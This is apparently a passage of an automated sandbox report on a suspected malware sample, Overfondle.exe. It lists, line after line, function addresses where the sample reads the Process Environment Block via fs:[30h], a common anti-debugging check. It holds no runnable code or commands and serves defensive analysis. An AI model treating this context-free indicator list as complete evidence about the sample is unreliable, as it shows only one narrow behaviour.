        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2045C020 mov eax, dword ptr fs:[00000030h]8_2_2045C020
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204F6030 mov eax, dword ptr fs:[00000030h]8_2_204F6030
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E20DE mov eax, dword ptr fs:[00000030h]8_2_204E20DE
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2045A0E3 mov ecx, dword ptr fs:[00000030h]8_2_2045A0E3
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E60E0 mov eax, dword ptr fs:[00000030h]8_2_204E60E0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204680E9 mov eax, dword ptr fs:[00000030h]8_2_204680E9
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2045C0F0 mov eax, dword ptr fs:[00000030h]8_2_2045C0F0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A20F0 mov ecx, dword ptr fs:[00000030h]8_2_204A20F0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046208A mov eax, dword ptr fs:[00000030h]8_2_2046208A
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204580A0 mov eax, dword ptr fs:[00000030h]8_2_204580A0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204F80A8 mov eax, dword ptr fs:[00000030h]8_2_204F80A8
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_205260B8 mov eax, dword ptr fs:[00000030h]8_2_205260B8
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_205260B8 mov ecx, dword ptr fs:[00000030h]8_2_205260B8
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204F4144 mov eax, dword ptr fs:[00000030h]8_2_204F4144
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204F4144 mov eax, dword ptr fs:[00000030h]8_2_204F4144
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204F4144 mov ecx, dword ptr fs:[00000030h]8_2_204F4144
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204F4144 mov eax, dword ptr fs:[00000030h]8_2_204F4144
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204F4144 mov eax, dword ptr fs:[00000030h]8_2_204F4144
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20466154 mov eax, dword ptr fs:[00000030h]8_2_20466154
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20466154 mov eax, dword ptr fs:[00000030h]8_2_20466154
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2045C156 mov eax, dword ptr fs:[00000030h]8_2_2045C156
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204F8158 mov eax, dword ptr fs:[00000030h]8_2_204F8158
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20534164 mov eax, dword ptr fs:[00000030h]8_2_20534164
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20534164 mov eax, dword ptr fs:[00000030h]8_2_20534164
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20520115 mov eax, dword ptr fs:[00000030h]8_2_20520115
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2050A118 mov ecx, dword ptr fs:[00000030h]8_2_2050A118
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2050A118 mov eax, dword ptr fs:[00000030h]8_2_2050A118
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2050A118 mov eax, dword ptr fs:[00000030h]8_2_2050A118
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2050A118 mov eax, dword ptr fs:[00000030h]8_2_2050A118
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2050E10E mov eax, dword ptr fs:[00000030h]8_2_2050E10E
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2050E10E mov ecx, dword ptr fs:[00000030h]8_2_2050E10E
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2050E10E mov eax, dword ptr fs:[00000030h]8_2_2050E10E
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2050E10E mov eax, dword ptr fs:[00000030h]8_2_2050E10E
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2050E10E mov ecx, dword ptr fs:[00000030h]8_2_2050E10E
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2050E10E mov eax, dword ptr fs:[00000030h]8_2_2050E10E
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2050E10E mov eax, dword ptr fs:[00000030h]8_2_2050E10E
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2050E10E mov ecx, dword ptr fs:[00000030h]8_2_2050E10E
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2050E10E mov eax, dword ptr fs:[00000030h]8_2_2050E10E
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2050E10E mov ecx, dword ptr fs:[00000030h]8_2_2050E10E
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20490124 mov eax, dword ptr fs:[00000030h]8_2_20490124
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_205261C3 mov eax, dword ptr fs:[00000030h]8_2_205261C3
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_205261C3 mov eax, dword ptr fs:[00000030h]8_2_205261C3
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204DE1D0 mov eax, dword ptr fs:[00000030h]8_2_204DE1D0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204DE1D0 mov eax, dword ptr fs:[00000030h]8_2_204DE1D0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204DE1D0 mov ecx, dword ptr fs:[00000030h]8_2_204DE1D0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204DE1D0 mov eax, dword ptr fs:[00000030h]8_2_204DE1D0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204DE1D0 mov eax, dword ptr fs:[00000030h]8_2_204DE1D0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204901F8 mov eax, dword ptr fs:[00000030h]8_2_204901F8
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_205361E5 mov eax, dword ptr fs:[00000030h]8_2_205361E5
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A0185 mov eax, dword ptr fs:[00000030h]8_2_204A0185
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20504180 mov eax, dword ptr fs:[00000030h]8_2_20504180
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20504180 mov eax, dword ptr fs:[00000030h]8_2_20504180
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E019F mov eax, dword ptr fs:[00000030h]8_2_204E019F
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E019F mov eax, dword ptr fs:[00000030h]8_2_204E019F
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E019F mov eax, dword ptr fs:[00000030h]8_2_204E019F
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E019F mov eax, dword ptr fs:[00000030h]8_2_204E019F
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2045A197 mov eax, dword ptr fs:[00000030h]8_2_2045A197
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2045A197 mov eax, dword ptr fs:[00000030h]8_2_2045A197
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2045A197 mov eax, dword ptr fs:[00000030h]8_2_2045A197
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2051C188 mov eax, dword ptr fs:[00000030h]8_2_2051C188
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2051C188 mov eax, dword ptr fs:[00000030h]8_2_2051C188
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2051A250 mov eax, dword ptr fs:[00000030h]8_2_2051A250
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2051A250 mov eax, dword ptr fs:[00000030h]8_2_2051A250
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E8243 mov eax, dword ptr fs:[00000030h]8_2_204E8243
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E8243 mov ecx, dword ptr fs:[00000030h]8_2_204E8243
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2053625D mov eax, dword ptr fs:[00000030h]8_2_2053625D
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2045A250 mov eax, dword ptr fs:[00000030h]8_2_2045A250
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20466259 mov eax, dword ptr fs:[00000030h]8_2_20466259
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20510274 mov eax, dword ptr fs:[00000030h]8_2_20510274
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20510274 mov eax, dword ptr fs:[00000030h]8_2_20510274
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20510274 mov eax, dword ptr fs:[00000030h]8_2_20510274
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20510274 mov eax, dword ptr fs:[00000030h]8_2_20510274
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20510274 mov eax, dword ptr fs:[00000030h]8_2_20510274
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20510274 mov eax, dword ptr fs:[00000030h]8_2_20510274
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20510274 mov eax, dword ptr fs:[00000030h]8_2_20510274
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20510274 mov eax, dword ptr fs:[00000030h]8_2_20510274
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20510274 mov eax, dword ptr fs:[00000030h]8_2_20510274
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20510274 mov eax, dword ptr fs:[00000030h]8_2_20510274
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20510274 mov eax, dword ptr fs:[00000030h]8_2_20510274
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20510274 mov eax, dword ptr fs:[00000030h]8_2_20510274
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20464260 mov eax, dword ptr fs:[00000030h]8_2_20464260
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20464260 mov eax, dword ptr fs:[00000030h]8_2_20464260
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20464260 mov eax, dword ptr fs:[00000030h]8_2_20464260
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2045826B mov eax, dword ptr fs:[00000030h]8_2_2045826B
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2045823B mov eax, dword ptr fs:[00000030h]8_2_2045823B
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046A2C3 mov eax, dword ptr fs:[00000030h]8_2_2046A2C3
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046A2C3 mov eax, dword ptr fs:[00000030h]8_2_2046A2C3
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046A2C3 mov eax, dword ptr fs:[00000030h]8_2_2046A2C3
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046A2C3 mov eax, dword ptr fs:[00000030h]8_2_2046A2C3
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046A2C3 mov eax, dword ptr fs:[00000030h]8_2_2046A2C3
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_205362D6 mov eax, dword ptr fs:[00000030h]8_2_205362D6
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204702E1 mov eax, dword ptr fs:[00000030h]8_2_204702E1
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204702E1 mov eax, dword ptr fs:[00000030h]8_2_204702E1
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204702E1 mov eax, dword ptr fs:[00000030h]8_2_204702E1
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E0283 mov eax, dword ptr fs:[00000030h]8_2_204E0283
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E0283 mov eax, dword ptr fs:[00000030h]8_2_204E0283
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E0283 mov eax, dword ptr fs:[00000030h]8_2_204E0283
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049E284 mov eax, dword ptr fs:[00000030h]8_2_2049E284
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049E284 mov eax, dword ptr fs:[00000030h]8_2_2049E284
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204702A0 mov eax, dword ptr fs:[00000030h]8_2_204702A0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204702A0 mov eax, dword ptr fs:[00000030h]8_2_204702A0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204F62A0 mov eax, dword ptr fs:[00000030h]8_2_204F62A0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204F62A0 mov ecx, dword ptr fs:[00000030h]8_2_204F62A0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204F62A0 mov eax, dword ptr fs:[00000030h]8_2_204F62A0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204F62A0 mov eax, dword ptr fs:[00000030h]8_2_204F62A0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204F62A0 mov eax, dword ptr fs:[00000030h]8_2_204F62A0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204F62A0 mov eax, dword ptr fs:[00000030h]8_2_204F62A0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2052A352 mov eax, dword ptr fs:[00000030h]8_2_2052A352
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20508350 mov ecx, dword ptr fs:[00000030h]8_2_20508350
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h]8_2_204E2349
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h]8_2_204E2349
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h]8_2_204E2349
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h]8_2_204E2349
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h]8_2_204E2349
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h]8_2_204E2349
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h]8_2_204E2349
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h]8_2_204E2349
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h]8_2_204E2349
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h]8_2_204E2349
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h]8_2_204E2349
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h]8_2_204E2349
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h]8_2_204E2349
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h]8_2_204E2349
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h]8_2_204E2349
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E035C mov eax, dword ptr fs:[00000030h]8_2_204E035C
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E035C mov eax, dword ptr fs:[00000030h]8_2_204E035C
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E035C mov eax, dword ptr fs:[00000030h]8_2_204E035C
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E035C mov ecx, dword ptr fs:[00000030h]8_2_204E035C
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E035C mov eax, dword ptr fs:[00000030h]8_2_204E035C
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E035C mov eax, dword ptr fs:[00000030h]8_2_204E035C
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2053634F mov eax, dword ptr fs:[00000030h]8_2_2053634F
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2050437C mov eax, dword ptr fs:[00000030h]8_2_2050437C
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049A30B mov eax, dword ptr fs:[00000030h]8_2_2049A30B
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049A30B mov eax, dword ptr fs:[00000030h]8_2_2049A30B
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049A30B mov eax, dword ptr fs:[00000030h]8_2_2049A30B
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2045C310 mov ecx, dword ptr fs:[00000030h]8_2_2045C310
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20480310 mov ecx, dword ptr fs:[00000030h]8_2_20480310
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_205043D4 mov eax, dword ptr fs:[00000030h]8_2_205043D4
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_205043D4 mov eax, dword ptr fs:[00000030h]8_2_205043D4
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204683C0 mov eax, dword ptr fs:[00000030h]8_2_204683C0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204683C0 mov eax, dword ptr fs:[00000030h]8_2_204683C0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204683C0 mov eax, dword ptr fs:[00000030h]8_2_204683C0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204683C0 mov eax, dword ptr fs:[00000030h]8_2_204683C0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046A3C0 mov eax, dword ptr fs:[00000030h]8_2_2046A3C0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046A3C0 mov eax, dword ptr fs:[00000030h]8_2_2046A3C0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046A3C0 mov eax, dword ptr fs:[00000030h]8_2_2046A3C0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046A3C0 mov eax, dword ptr fs:[00000030h]8_2_2046A3C0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046A3C0 mov eax, dword ptr fs:[00000030h]8_2_2046A3C0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046A3C0 mov eax, dword ptr fs:[00000030h]8_2_2046A3C0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2050E3DB mov eax, dword ptr fs:[00000030h]8_2_2050E3DB
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2050E3DB mov eax, dword ptr fs:[00000030h]8_2_2050E3DB
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2050E3DB mov ecx, dword ptr fs:[00000030h]8_2_2050E3DB
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2050E3DB mov eax, dword ptr fs:[00000030h]8_2_2050E3DB
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2051C3CD mov eax, dword ptr fs:[00000030h]8_2_2051C3CD
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204703E9 mov eax, dword ptr fs:[00000030h]8_2_204703E9
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204703E9 mov eax, dword ptr fs:[00000030h]8_2_204703E9
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204703E9 mov eax, dword ptr fs:[00000030h]8_2_204703E9
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204703E9 mov eax, dword ptr fs:[00000030h]8_2_204703E9
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204703E9 mov eax, dword ptr fs:[00000030h]8_2_204703E9
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204703E9 mov eax, dword ptr fs:[00000030h]8_2_204703E9
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204703E9 mov eax, dword ptr fs:[00000030h]8_2_204703E9
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204703E9 mov eax, dword ptr fs:[00000030h]8_2_204703E9
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204963FF mov eax, dword ptr fs:[00000030h]8_2_204963FF
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2047E3F0 mov eax, dword ptr fs:[00000030h]8_2_2047E3F0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2047E3F0 mov eax, dword ptr fs:[00000030h]8_2_2047E3F0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2047E3F0 mov eax, dword ptr fs:[00000030h]8_2_2047E3F0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2048438F mov eax, dword ptr fs:[00000030h]8_2_2048438F
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2048438F mov eax, dword ptr fs:[00000030h]8_2_2048438F
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2045E388 mov eax, dword ptr fs:[00000030h]8_2_2045E388
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2045E388 mov eax, dword ptr fs:[00000030h]8_2_2045E388
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2045E388 mov eax, dword ptr fs:[00000030h]8_2_2045E388
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20458397 mov eax, dword ptr fs:[00000030h]8_2_20458397
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20458397 mov eax, dword ptr fs:[00000030h]8_2_20458397
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20458397 mov eax, dword ptr fs:[00000030h]8_2_20458397
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2051A456 mov eax, dword ptr fs:[00000030h]8_2_2051A456
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049E443 mov eax, dword ptr fs:[00000030h]8_2_2049E443
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049E443 mov eax, dword ptr fs:[00000030h]8_2_2049E443
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049E443 mov eax, dword ptr fs:[00000030h]8_2_2049E443
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049E443 mov eax, dword ptr fs:[00000030h]8_2_2049E443
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049E443 mov eax, dword ptr fs:[00000030h]8_2_2049E443
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049E443 mov eax, dword ptr fs:[00000030h]8_2_2049E443
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049E443 mov eax, dword ptr fs:[00000030h]8_2_2049E443
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049E443 mov eax, dword ptr fs:[00000030h]8_2_2049E443
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2048245A mov eax, dword ptr fs:[00000030h]8_2_2048245A
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204EC460 mov ecx, dword ptr fs:[00000030h]8_2_204EC460
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2048A470 mov eax, dword ptr fs:[00000030h]8_2_2048A470
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2048A470 mov eax, dword ptr fs:[00000030h]8_2_2048A470
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2048A470 mov eax, dword ptr fs:[00000030h]8_2_2048A470
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20498402 mov eax, dword ptr fs:[00000030h]8_2_20498402
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20498402 mov eax, dword ptr fs:[00000030h]8_2_20498402
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20498402 mov eax, dword ptr fs:[00000030h]8_2_20498402
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2045C427 mov eax, dword ptr fs:[00000030h]8_2_2045C427
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2045E420 mov eax, dword ptr fs:[00000030h]8_2_2045E420
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2045E420 mov eax, dword ptr fs:[00000030h]8_2_2045E420
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2045E420 mov eax, dword ptr fs:[00000030h]8_2_2045E420
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E6420 mov eax, dword ptr fs:[00000030h]8_2_204E6420
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E6420 mov eax, dword ptr fs:[00000030h]8_2_204E6420
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E6420 mov eax, dword ptr fs:[00000030h]8_2_204E6420
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E6420 mov eax, dword ptr fs:[00000030h]8_2_204E6420
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E6420 mov eax, dword ptr fs:[00000030h]8_2_204E6420
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E6420 mov eax, dword ptr fs:[00000030h]8_2_204E6420
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E6420 mov eax, dword ptr fs:[00000030h]8_2_204E6420
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049A430 mov eax, dword ptr fs:[00000030h]8_2_2049A430
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204604E5 mov ecx, dword ptr fs:[00000030h]8_2_204604E5
